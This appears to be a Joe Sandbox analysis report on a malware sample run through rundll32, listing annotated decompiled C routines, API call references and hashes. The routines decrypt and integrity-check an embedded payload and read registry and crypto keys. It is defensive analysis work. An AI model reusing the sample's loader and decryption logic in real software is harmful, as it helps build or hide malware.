                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 55258dadde90c0e336740793b9e9700582964be33809af1c03ef0e64c8e988f4
                                • Instruction ID: 3f3f81e0034ae2f65f1e9aa7d3e9fb16bd71a46376799d6c1ec3ec4c800a4908
                                • Opcode Fuzzy Hash: 55258dadde90c0e336740793b9e9700582964be33809af1c03ef0e64c8e988f4
                                • Instruction Fuzzy Hash: 83B01275144200ABCB116F00DE04F057AB1A750700F004010B354690F883720430FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
			E034313C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				// __eax: parameter block whose first dword must be 0x400; __ecx: input length;
				// _a4: input buffer (body followed by a 0x80-byte trailer); _a8: receives the output buffer.
				// Returns the output length, or 0 on any failure (the output buffer is released in that case).
				void* _v8;			// output heap buffer
				int _v12;			// output length produced by E03435FBB
				char _v16;
				intOrPtr _v20;		// 16 bytes (_v32.._v20) computed by E03436EE7 over the output
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;			// length recovered from the trailer
				intOrPtr _v152;		// 16 bytes (_v164.._v152) recovered from the trailer
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {	// need more than the 0x80-byte trailer and the expected 0x400 tag
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					// process the trailing 0x80 bytes: yields the 16-byte reference value and the declared length
					_t37 = E03436FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {	// declared length must fit in the body before the trailer
						goto L21;
					}
					// if the 16 entries following the recovered length are all zero, the body is used as-is
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E03436D63(_t53);		// RtlAllocateHeap wrapper
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;			// from here on a zero length means failure
							L18:
							if(_t53 != 0) {
								goto L21;		// success: return the output length
							}
							L19:
							if(_v8 != 0) {
								E03436C2C(_v8);	// RtlFreeHeap wrapper: release the buffer on failure
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						// recompute the 16-byte value over the output and compare all four dwords with the trailer's
						E03436EE7(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;	// integrity check passed: hand the buffer to the caller
							goto L18;
						}
					}
					_t58 =  &_v144;
					// otherwise transform the body (length rounded down to a multiple of 16) into a new heap buffer
					_t42 = E03435FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {	// transformed output must cover the declared length
						goto L8;
					}
					goto L15;
				}
			}


                                APIs
                                • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 0343144E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction ID: cc0388de929826e92f69ac4db1c04c836891d9d286c607819b1f5830603b99c1
                                • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction Fuzzy Hash: A1317671900219FFDF21EF94C9C0BEEB7B8BB1A304F1445AAE509AB241D6349E45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.462745611.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f30000_rundll32.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 42bfce4ad4a4c9919c046fb102624acd987536cc5573b600d70b21d263cdb303
                                • Instruction ID: 73de1b809aab9b574106fe46f392afd19d5e117482ae15706c65cfbb1b37ad19
                                • Opcode Fuzzy Hash: 42bfce4ad4a4c9919c046fb102624acd987536cc5573b600d70b21d263cdb303
                                • Instruction Fuzzy Hash: A741F2B49002068FDB44DF68C5947AEBBF0FF48314F24856DD858AB341E77AA946CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0347E30A,?), ref: 0348FDB6
                                  • Part of subcall function 0348AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,034763CD,00000000,00000001,-00000007,?,00000000), ref: 0348AFA6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                • String ID:
                                • API String ID: 1301464996-0
                                • Opcode ID: 28c7c96f79f21d3eb83963182ec8419c5cf81b66132c869af16676dc60c5ede5
                                • Instruction ID: 8e9747e2ac87d18ef2c62f9d9f9e5111a3c147bdd2f497c2d58162dcf986c243
                                • Opcode Fuzzy Hash: 28c7c96f79f21d3eb83963182ec8419c5cf81b66132c869af16676dc60c5ede5
                                • Instruction Fuzzy Hash: 4E11A376A10201AFDB55FB49EC81EAE77E9EF98314F10006BEA02EF341D7749D458B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(?,0349A324,00000018,03486FFC,06168E36,?,03486FFC,06168E36,?,03486FFC,06168E36,?,?,?,?,03486FFC), ref: 03482CB2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: b671f044b674ce46cc21df945d77e5c175128f7813103d335cd6800df9ea65e1
                                • Instruction ID: c66d135ab7a4860f8724d1672d3351ddbf2c0b6443ef964c6efdb105cad22b96
                                • Opcode Fuzzy Hash: b671f044b674ce46cc21df945d77e5c175128f7813103d335cd6800df9ea65e1
                                • Instruction Fuzzy Hash: 73118671500105BFDB34FF5AEC86CAA3BE9E7AD214748822BEC18AF355DB316511CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 03477100
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                  • Part of subcall function 0347EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0347EE2A
                                  • Part of subcall function 0347EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0347EE36
                                  • Part of subcall function 0347EE04: GetModuleHandleA.KERNEL32(?,0616978E,00000000,?,00000000), ref: 0347EE56
                                  • Part of subcall function 0347EE04: GetProcAddress.KERNEL32(00000000), ref: 0347EE5D
                                  • Part of subcall function 0347EE04: Thread32First.KERNEL32(?,0000001C), ref: 0347EE6D
                                  • Part of subcall function 0347EE04: CloseHandle.KERNEL32(?), ref: 0347EEB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                • String ID:
                                • API String ID: 2627809124-0
                                • Opcode ID: 64f4c492db23f35b7c4bae630663bddb5876a6eccdc504bf21db16bc345b400c
                                • Instruction ID: 04160dbadd3918819ff01ec8497054ed1b361d8aacb06c4b8383bdae6e4d9b1e
                                • Opcode Fuzzy Hash: 64f4c492db23f35b7c4bae630663bddb5876a6eccdc504bf21db16bc345b400c
                                • Instruction Fuzzy Hash: 41018B75610204BFDB11EBAADC85CEFBBECEF65244704006BF401BB204DA30AE04DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,034804AC,0348C384,00000000,00000000), ref: 034915F0
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                  • Part of subcall function 03473172: lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                  • Part of subcall function 03473172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                  • Part of subcall function 03473172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                  • Part of subcall function 03473172: GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                  • Part of subcall function 03473172: HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                • String ID:
                                • API String ID: 730886825-0
                                • Opcode ID: 9bf946976bc78182fd2bd0d80aab1c653b0271367fd26ae2d5f3c4f32e0a39ad
                                • Instruction ID: 3f9528745a002eaa805bcb066e5b749a8d19671befd69df5799c76dbd6c5f6f5
                                • Opcode Fuzzy Hash: 9bf946976bc78182fd2bd0d80aab1c653b0271367fd26ae2d5f3c4f32e0a39ad
                                • Instruction Fuzzy Hash: 7B018C35510204BFEB21EB95CC49F9E7BECAB06610F04004BB501BE284DA70AA00D7A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03484855
                                  • Part of subcall function 0348A451: memset.NTDLL ref: 0348A477
                                  • Part of subcall function 0348A451: memcpy.NTDLL ref: 0348A49F
                                  • Part of subcall function 0348A451: GetLastError.KERNEL32(00000010,00000218,0349386D,00000100,?,00000318,00000008), ref: 0348A4B6
                                  • Part of subcall function 0348A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0349386D,00000100), ref: 0348A599
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 4290293647-0
                                • Opcode ID: 5b2f263d7f4184a41f74a888a5d74c8e815e318468028f31ca900844e99c3833
                                • Instruction ID: 2c39c871469af7ad0b175c4b03088a5f72c987a67a9cadd04c6e700e911cb5b6
                                • Opcode Fuzzy Hash: 5b2f263d7f4184a41f74a888a5d74c8e815e318468028f31ca900844e99c3833
                                • Instruction Fuzzy Hash: AE01FD345013596BC721FF2BD804B8F7BE8AB44724F04882BFC489E340D371D9048AA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0343155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi; // out-pointer that receives the resulting string buffer
                                				if(_a4 == 0) {
                                					L2:
                                					// 0x80000002 matches the HKEY_LOCAL_MACHINE predefined handle value;
                                					// E034312CA fills _a4 and _a12 through the two out-pointers, _a12 being treated as a byte length below
                                					_t27 = E034312CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1; // byte length to WCHAR count
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0x343a2d8, 0, _a4); // empty result: release the buffer (HeapFree ref 034315BF in the APIs list below)
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0; // overwrite the last WCHAR with a terminator
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E03431B6F(_a4, _a8, _a12, __edi); // executed; the subcall frees a BSTR via SysFreeString (see APIs below)
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}









                                APIs
                                  • Part of subcall function 03431B6F: SysFreeString.OLEAUT32(00000000), ref: 03431BD2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,034321A9,?,004F0053,055E9400,00000000,?), ref: 034315BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID:
                                • API String ID: 3806048269-0
                                • Opcode ID: 17d1399b633a62990b78afa1c25d15d078900b391e45e93c0f072d3d7f1f2c3b
                                • Instruction ID: 7dcd57b5eee47585b4e64878ea9ba59db4bc412f28d9191ba99984d190459cbe
                                • Opcode Fuzzy Hash: 17d1399b633a62990b78afa1c25d15d078900b391e45e93c0f072d3d7f1f2c3b
                                • Instruction Fuzzy Hash: BC014B36500659BBCB22EF94CC01EEA7BA5EF09750F08842AFE169F364D731D960DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E034324B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                				void* _t11; // not declared in the decompiler output
                                				void* _t13;
                                				void* _t21;
                                				void* _t23; // not declared in the decompiler output; passed through unmodified
                                
                                				_t11 =  &_a4;
                                				_t21 = 0;
                                				__imp__( &_a8); // import call at 034324C4, resolved as lstrlen.KERNEL32 in the APIs list below
                                				// E03435FBB wraps CryptAcquireContextW / CryptImportKey / CryptSetKeyParam (see APIs below)
                                				_t13 = E03435FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                				if(_t13 == 0) {
                                					_t21 = E03436D63(_a8 + _a8); // RtlAllocateHeap wrapper, allocating twice _a8
                                					if(_t21 != 0) {
                                						E0343298F(_a4, _t21, _t23);
                                					}
                                					E03436C2C(_a4); // RtlFreeHeap wrapper
                                				}
                                				return _t21;
                                			}






                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 034324C4
                                  • Part of subcall function 03435FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,034324D8,00000001,034358D7,00000000), ref: 03435FF3
                                  • Part of subcall function 03435FBB: memcpy.NTDLL(034324D8,034358D7,00000010,?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740), ref: 0343600C
                                  • Part of subcall function 03435FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03436035
                                  • Part of subcall function 03435FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0343604D
                                  • Part of subcall function 03435FBB: memcpy.NTDLL(00000000,75BCC740,055E95B0,00000010), ref: 0343609F
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                • String ID:
                                • API String ID: 894908221-0
                                • Opcode ID: dad2d23339612fd8aab51a1689c13ac7c69579f651cd572410ed3f079e5edd61
                                • Instruction ID: c01ba36572a2cfd5d61940e6d218cbd7c54abdafb449deb442c0c8395da02048
                                • Opcode Fuzzy Hash: dad2d23339612fd8aab51a1689c13ac7c69579f651cd572410ed3f079e5edd61
                                • Instruction Fuzzy Hash: 0DF03A3A100209BBCF11AE56DC40DEB7BADEF8A260B058027FD08DF114DA72DA559BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034374B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                				intOrPtr _t14; // not declared in the decompiler output; added to the computed size
                                				void* _t17;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					// size argument: character count of the wide string plus _t14 plus 2
                                					return E034323D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                				}
                                				_t17 = E034314F1(_a4, _a8, _a12, _a16, _a20); // executed; uses SysAllocString / SysFreeString (see APIs below)
                                				if(_t17 != 0) {
                                					goto L2;
                                				}
                                				return _t17;
                                			}





                                APIs
                                • lstrlenW.KERNEL32(?,?,?,0343363B,3D034390,80000002,03437168,03437283,74666F53,4D4C4B48,03437283,?,3D034390,80000002,03437168,?), ref: 034374DB
                                  • Part of subcall function 034314F1: SysAllocString.OLEAUT32(03437283), ref: 0343150A
                                  • Part of subcall function 034314F1: SysFreeString.OLEAUT32(00000000), ref: 0343154B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: 96de9c2b671dbe38217f84a0e909a28b3a20e52dc08b95808e99fc5c40d9d008
                                • Instruction ID: 67d517bd264722f6c2ef3de91370b1eb17b8145ce7a032e51dffb1aa6d74490d
                                • Opcode Fuzzy Hash: 96de9c2b671dbe38217f84a0e909a28b3a20e52dc08b95808e99fc5c40d9d008
                                • Instruction Fuzzy Hash: ADF0923600020EBFDF02AF91EC05EEA3F6AAB29350F048015BA44991B1D772D5B1EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03432B23(void* __edi, void* _a4) {
                                				int _t7;
                                				int _t12;
                                
                                				_t7 = E03432575(__edi, _a4,  &_a4); // executed; return value is used as a byte count, buffer returned through &_a4
                                				_t12 = _t7;
                                				if(_t12 != 0) {
                                					memcpy(__edi, _a4, _t12); // copy _t12 bytes into the caller's buffer
                                					 *((char*)(__edi + _t12)) = 0; // NUL-terminate
                                					E03436C2C(_a4); // RtlFreeHeap wrapper: release the temporary buffer
                                				}
                                				return _t12;
                                			}






                                APIs
                                  • Part of subcall function 03432575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,03434493,?), ref: 034325AB
                                  • Part of subcall function 03432575: memset.NTDLL ref: 03432621
                                  • Part of subcall function 03432575: memset.NTDLL ref: 03432635
                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,03434493,?,?,?,?), ref: 03432B3F
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpymemset$FreeHeap
                                • String ID:
                                • API String ID: 3053036209-0
                                • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction ID: a0b8f44922c0558c33a868355fd7cc35bae73c11d3b7e19a2d2f6cd9117d946c
                                • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction Fuzzy Hash: 0BE0867A4002197ACB126E95DC40DEB7F5CDF4B591F044016FE084F204D632C61097F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 034773F5
                                  • Part of subcall function 03476261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 034762A8
                                  • Part of subcall function 03476261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 034762BE
                                  • Part of subcall function 03476261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 03476307
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open$Closememset
                                • String ID:
                                • API String ID: 1685373161-0
                                • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                • Instruction ID: e6afd5bafc2e8b07c5aee4267355eb781168907ca7cb29016515ec79b41fc049
                                • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                                • Instruction Fuzzy Hash: 34E0EC38240208BBDB50FE56DC51FD97B599B04754F10801ABE086E741DA75A660C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,034960E0,0000002C,034890D3,06168E36,?,00000000,0348A484,?,00000318), ref: 03491EB7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: a8d90a1caa6b739d66fd54875a1ecf231c809fa9e48db57fccbf2081ee45807f
                                • Instruction ID: e6526414161cf11e270919995c87d7430f14e7389c04f5c542d49a0c38f9c987
                                • Opcode Fuzzy Hash: a8d90a1caa6b739d66fd54875a1ecf231c809fa9e48db57fccbf2081ee45807f
                                • Instruction Fuzzy Hash: 31D0E234E016199BDF21DB95D84A99EFB70BF09720F608226E8607B190C23019158B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                  • Part of subcall function 034821B6: ExpandEnvironmentStringsW.KERNEL32(0347AEB5,00000000,00000000,00000001,00000000,00000000,0347E448,0347AEB5,00000000,0347E448,?), ref: 034821CD
                                  • Part of subcall function 034821B6: ExpandEnvironmentStringsW.KERNEL32(0347AEB5,00000000,00000000,00000000), ref: 034821E7
                                • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                • lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                • memset.NTDLL ref: 0348BB71
                                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
